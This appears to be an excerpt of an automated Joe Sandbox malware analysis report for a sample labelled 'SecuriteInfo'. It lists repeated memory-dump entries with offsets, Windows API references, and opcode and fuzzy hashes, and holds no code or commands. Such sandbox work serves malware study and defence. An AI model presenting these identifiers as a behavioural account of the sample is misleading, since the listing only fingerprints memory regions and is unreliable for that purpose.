• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 060A767F
• KiUserExceptionDispatcher.NTDLL ref: 060A76C4
• KiUserExceptionDispatcher.NTDLL ref: 060A7820
Memory Dump Source
• Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
                                                                                            • Opcode ID: 48ea3f2fed6dc2d00ce039933201da440ccfcc3e789dfc4fc9d9e344b7158d15
                                                                                            • Instruction ID: b4fb701ad31a250b2fab810c2e2debbda5588e01b8a36d2113c8d692f3cc3f03
                                                                                            • Opcode Fuzzy Hash: 48ea3f2fed6dc2d00ce039933201da440ccfcc3e789dfc4fc9d9e344b7158d15
                                                                                            • Instruction Fuzzy Hash: 50B14538A45358CFCB65DF60C88869DBBB2BF49346F1081E9D50A62740DB398EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A76C4
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 43997b6f605b4732bdbe5b5cdee1c85727034c40ef218ca2ea807a5fa2315b91
                                                                                            • Instruction ID: 20d094bc10d618ec843670a9f24b6568ecf578657ec40219703debe3b8db18e2
                                                                                            • Opcode Fuzzy Hash: 43997b6f605b4732bdbe5b5cdee1c85727034c40ef218ca2ea807a5fa2315b91
                                                                                            • Instruction Fuzzy Hash: 3DB14538A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 3b453e5c957ab27e1939a6fb5219c97f290c23a9e32e14408e01c28b8d9453eb
                                                                                            • Instruction ID: 38b525d41289d8cbcbc0598165ed63d70ea3a4d053a1f9510b56ad426657e585
                                                                                            • Opcode Fuzzy Hash: 3b453e5c957ab27e1939a6fb5219c97f290c23a9e32e14408e01c28b8d9453eb
                                                                                            • Instruction Fuzzy Hash: 4DB14438A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 92b5ce110fe14e44ad47b3d27b51babf297cd474e6bcf0c452fcf1e554d66972
                                                                                            • Instruction ID: 9feed7fa33c1efa51177c3728d2c90c1a1b9f57f5cbd31270357da44735b05e4
                                                                                            • Opcode Fuzzy Hash: 92b5ce110fe14e44ad47b3d27b51babf297cd474e6bcf0c452fcf1e554d66972
                                                                                            • Instruction Fuzzy Hash: E0A14538A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 21ac66eeae07a20b8165979336b6224ff0819e9977595c21b5b8821623f8a987
                                                                                            • Instruction ID: ea1bb8d4dd840777ff61a4975a316564cb3aad7686879e47615330cd9bde2d2b
                                                                                            • Opcode Fuzzy Hash: 21ac66eeae07a20b8165979336b6224ff0819e9977595c21b5b8821623f8a987
                                                                                            • Instruction Fuzzy Hash: AAA15638A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 27be126b822d8b78ebb4c26cf7b819785df02ccc508b983b3ec5dd5e14eff702
                                                                                            • Instruction ID: 50a1d2504e153fa58bf3b5d36dd90093a844620f6d4448a5d2701e3e8a052315
                                                                                            • Opcode Fuzzy Hash: 27be126b822d8b78ebb4c26cf7b819785df02ccc508b983b3ec5dd5e14eff702
                                                                                            • Instruction Fuzzy Hash: A5A16838A45358CFCB65DF60D88869DBBB2BF45346F2081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: afb1d5cfa0f03cb45d7bec7eb9543ddada81606dd902051c42c932535704c093
                                                                                            • Instruction ID: fee80cc847fefc8d2009bfab18fbb423a954c24eea18ddf6ce4337952b7fdb9f
                                                                                            • Opcode Fuzzy Hash: afb1d5cfa0f03cb45d7bec7eb9543ddada81606dd902051c42c932535704c093
                                                                                            • Instruction Fuzzy Hash: 31916838A45368CFCB65DF60C88869DBBB2BF45346F2081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 4f53ac0ba293e0784f6bcc031bb38d56fa9cf1f4f8581bb773a8573c74016b60
                                                                                            • Instruction ID: bc1fa6149bfc8d1bef38c3caff939c19cd1eafbe765decbd72e0f1da0acf68ce
                                                                                            • Opcode Fuzzy Hash: 4f53ac0ba293e0784f6bcc031bb38d56fa9cf1f4f8581bb773a8573c74016b60
                                                                                            • Instruction Fuzzy Hash: 424156B0D00249DFDB11CFA9D8557DEBBF2AF08314F24852AE856AB340D7749846CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 060AF6E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2714655100-0
                                                                                            • Opcode ID: 8f2ebb4d0ec11f2c1a70455febed6a7218a43359c17742c56927d98f18d4d173
                                                                                            • Instruction ID: 3c704cae01414f0c05a68dcd0367c2903424c5652bb16923ce6f3ed806d4251c
                                                                                            • Opcode Fuzzy Hash: 8f2ebb4d0ec11f2c1a70455febed6a7218a43359c17742c56927d98f18d4d173
                                                                                            • Instruction Fuzzy Hash: DF4147B4A003468FDB54CF99C888AAEBBF5FF88314F248459D519AB321D774A841CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: c25f9b7df8a072d91cabcc28fd2f426fc58f1cd421a0b30e349ea8c97f03dd3e
                                                                                            • Instruction ID: a50173a423bf53c6e006ad40850b43397c3e5ccf2fa67902e6cbb36181dd3c29
                                                                                            • Opcode Fuzzy Hash: c25f9b7df8a072d91cabcc28fd2f426fc58f1cd421a0b30e349ea8c97f03dd3e
                                                                                            • Instruction Fuzzy Hash: D73134B0D00249CFDB15CFA9D8557DEBBB2AF08314F20812AE816AB384D7759846CF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02DB4D62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID:
                                                                                            • API String ID: 2118026453-0
                                                                                            • Opcode ID: 9c640ab5fdf9f6d123926c9acc0bdc97400cc9bca12c706d77f27b1336a156ca
                                                                                            • Instruction ID: e051cc6347464ef082ad0d6afc4f8acab0e706eeae07afccfa8517c8311b3353
                                                                                            • Opcode Fuzzy Hash: 9c640ab5fdf9f6d123926c9acc0bdc97400cc9bca12c706d77f27b1336a156ca
                                                                                            • Instruction Fuzzy Hash: C12163B19412088BCB20DFA9D8587DABBF4FB08314F24886AD646A7305D3389906CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02DB4D62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID:
                                                                                            • API String ID: 2118026453-0
                                                                                            • Opcode ID: e9924289e77d25993b2388415cf9242bba988d9ee97540fa40df602c519decef
                                                                                            • Instruction ID: 9226e8f7c529a1915ee4db08d91253d4f07187d69f85e8e90a465c1808ceb5bd
                                                                                            • Opcode Fuzzy Hash: e9924289e77d25993b2388415cf9242bba988d9ee97540fa40df602c519decef
                                                                                            • Instruction Fuzzy Hash: 581183B09413088FCB20CFA9D4187DEBBF4EB48314F20882AD505A7704D738A946CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 060AFA47
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 7bfb6a84effc461cf7f4d2380255e4212b078c5600ed24854a909bf97eadd8a8
                                                                                            • Instruction ID: 04cb238f7411f4dc8860103846092b02893195cea8caa0f1583449360ac866dc
                                                                                            • Opcode Fuzzy Hash: 7bfb6a84effc461cf7f4d2380255e4212b078c5600ed24854a909bf97eadd8a8
                                                                                            • Instruction Fuzzy Hash: 431125B19003498FCB20CFAAD844BDEFFF4EB48324F10841AD569A7200C774A944CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 060AFA47
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 3df2e3d3a523ce1ab166ec8d41960dea1929b9ac320ee2ecb1daba7a689cf879
                                                                                            • Instruction ID: 7f85230611421d4ed405609746323a9a7cc43a320aa53fd4277998a1b7e0c973
                                                                                            • Opcode Fuzzy Hash: 3df2e3d3a523ce1ab166ec8d41960dea1929b9ac320ee2ecb1daba7a689cf879
                                                                                            • Instruction Fuzzy Hash: 1B1103B19003498FCB20CFAAD444BDEFBF4AB48364F14841AD529B7300C775A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 358165f20a561aed7b7361227e1090d878a08489c03ba3fe07e7af3cf1384909
• Instruction ID: 844f61c2d64cd5e54d3d56b99628cf38931fe508abc4696751c6dc04e127a79f
• Opcode Fuzzy Hash: 358165f20a561aed7b7361227e1090d878a08489c03ba3fe07e7af3cf1384909
• Instruction Fuzzy Hash: 2C2125B1504244DFDB05CF14D9C0B2ABF65FB88328F34857DE9064B24AC336D956CBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6406b66fc9b7f3b213af935ef2a69fd7cfc2fb6739c9738fa9aea8aee6f33607
• Instruction ID: 5f181492174c4842719115c97b3658bfe571a4bf9ecba4df815a65d6714a00ed
• Opcode Fuzzy Hash: 6406b66fc9b7f3b213af935ef2a69fd7cfc2fb6739c9738fa9aea8aee6f33607
• Instruction Fuzzy Hash: EF21F1B1504244DFDB01DF10D8C0B2ABB65FB88224F2486BDE9064A34AC336D856C6A2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526773769.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2cdd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b74e5f04c153d8ab529c1a2cd50e9c2b833e2406570718f4fc4659ab664686d1
• Instruction ID: b3d2500002b5dabdb150edcbf1e2e71e443ad7a15b016229ee6e347ad24c38c9
• Opcode Fuzzy Hash: b74e5f04c153d8ab529c1a2cd50e9c2b833e2406570718f4fc4659ab664686d1
• Instruction Fuzzy Hash: 1C212971604244DFDB14DF50D9C4B26BB65FB88318F24C96DEA494F346C336E846CBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 83befa0dcf574f1700ca1fb115a9994b35c931211cf14f810c9e75b32f73ec64
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: 0911B1B6504280DFCB11CF10D9C4B16BF71FB84324F2486ADD80A4B656C33AD55ACBA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction ID: 05474702d17b3ffd97409d434c2ff4e7cf24ce6b9117a2cfa1b841645a19d277
• Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
• Instruction Fuzzy Hash: 1A11BE76904284CFCB12CF10D9C4B56BF71FB88324F28C6ADD8054B65AC33AD55ACBA2
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.526773769.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_2cdd000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction ID: a098f810e32e118fde1cc284c1beb83c8ec36c4bd7fbbffc4ecb498258d68d26
• Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
• Instruction Fuzzy Hash: 5511BB75504284DFCB11CF50D9C4B15BFA1FB88328F28C6AED9494B696C33AE44ACB62
Uniqueness
Uniqueness Score: -1.00%